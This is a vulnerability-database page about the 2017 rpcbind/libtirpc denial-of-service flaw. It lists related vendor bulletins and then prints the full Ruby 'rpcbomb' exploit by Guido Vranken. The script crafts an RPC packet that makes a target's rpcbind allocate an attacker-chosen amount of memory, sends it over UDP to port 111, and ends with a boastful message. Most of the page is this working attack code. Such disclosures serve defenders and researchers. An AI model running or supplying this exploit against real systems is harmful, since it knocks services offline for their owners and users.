RPCBind / libtirpc Denial Of Service

🗓️ 08 May 2017 00:00:00Reported by Guido VrankenType

packetstorm🔗 packetstormsecurity.com👁 95 Views

RPCBind / libtirpc Denial Of Service exploit by Guido Vranken for *nix rpcbind/libtirpc

Reporter	Title	Published	Views	Family All 201
IBM Security Bulletins	Security Bulletin: A vulnerability in rpcbind affects PowerKVM	18 Jun 201801:36	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple vulnerabilities in coreutils, sudo, jasper, bind, bash, libtirpc, nss and nss-util affect IBM SmartCloud Entry	19 Jul 202000:49	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Security Guardium is affected by Open Source packages vulnerabilities	16 Jun 201822:04	–	ibm
IBM Security Bulletins	Security Bulletin: A vulnerability in libtirpc affects PowerKVM	18 Jun 201801:36	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerability in libtirpc affects Power Hardware Management Console (CVE-2017-8779)	23 Sep 202101:45	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple vulnerabilities affect Intel® Manycore Platform Software Stack (Intel® MPSS) for Linux and Windows	25 Feb 201920:40	–	ibm
0day.today	RPCBind / libtirpc - Denial of Service Exploit	9 May 201700:00	–	zdt
Amazon	Important: libtirpc	6 Jun 201700:00	–	amazon
Amazon	Important: rpcbind	6 Jun 201700:00	–	amazon
Tenable Nessus	Amazon Linux AMI : libtirpc (ALAS-2017-840)	7 Jun 201700:00	–	nessus

`#!/usr/bin/ruby  
#  
# Source: https://raw.githubusercontent.com/guidovranken/rpcbomb/fe53048af2d4fb78c911e71a30f21afcffbbf5e1/rpcbomb.rb  
#  
# By Guido Vranken https://guidovranken.wordpress.com/  
# Thanks to Sean Verity for writing an exploit in Ruby for an earlier  
# vulnerability: https://www.exploit-db.com/exploits/26887/  
# I've used it as a template.  
  
require 'socket'  
def usage  
abort "\nusage: ./rpcbomb.rb <target> <# bytes to allocate> [port]\n\n"  
end  
bomb = """  
` + # ,   
: @ @ @ @ @ @   
@ @ ; . + @ @ @ . @ @   
@ @ @ @ @ ` @ @   
. ` @ #   
; @ @ @ . : @ @ @ @   
@ @ @ @ @ @ @ @ @ @ @ ;   
@ @ @ @ @ @ @ @ @ @ @ @ @ `   
@ @ @ @ @ @ @ @ @ @ @ @ @ @ :   
# @ @ @ @ @ @ @ @ @ @ @ @ @ '   
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @   
. @ @ @ @ @ @ @ @ @ @ @ @ @ @ @   
+ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @   
+ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @   
: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @   
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @   
@ @ @ @ @ @ @ @ @ @ @ @ @ @ ,   
@ @ @ @ @ @ @ @ @ @ @ @ @   
, @ @ @ @ @ @ @ @ @ @ @   
` @ @ @ @ @ @ @ @ @   
, @ @ @ @ @   
r p c b o m b  
  
DoS exploit for *nix rpcbind/libtirpc.  
  
(c) 2017 Guido Vranken.  
  
https://guidovranken.wordpress.com/  
  
"""  
  
puts bomb  
  
if ARGV.length >= 2  
begin  
host = ARGV[0]  
numBytes = Integer(ARGV[1])  
port = ARGV.length == 3 ? Integer(ARGV[2]) : 111  
rescue  
usage  
end  
  
pkt = [0].pack('N') # xid  
pkt << [0].pack('N') # message type CALL  
pkt << [2].pack('N') # RPC version 2  
pkt << [100000].pack('N') # Program  
pkt << [4].pack('N') # Program version  
pkt << [9].pack('N') # Procedure  
pkt << [0].pack('N') # Credentials AUTH_NULL  
pkt << [0].pack('N') # Credentials length 0  
pkt << [0].pack('N') # Credentials AUTH_NULL  
pkt << [0].pack('N') # Credentials length 0  
pkt << [0].pack('N') # Program: 0  
pkt << [0].pack('N') # Ver  
pkt << [4].pack('N') # Proc  
pkt << [4].pack('N') # Argument length  
pkt << [numBytes].pack('N') # Payload  
  
s = UDPSocket.new  
s.send(pkt, 0, host, port)  
  
sleep 1.5  
  
begin  
s.recvfrom_nonblock(9000)  
rescue  
puts "No response from server received."  
exit()  
end  
  
puts "Allocated #{numBytes} bytes at host #{host}:#{port}.\n" +  
"\nDamn it feels good to be a gangster.\n\n"  
else  
usage  
end  
  
`

08 May 2017 00:00Current

8.1High risk

Vulners AI Score8.1

EPSS0.81921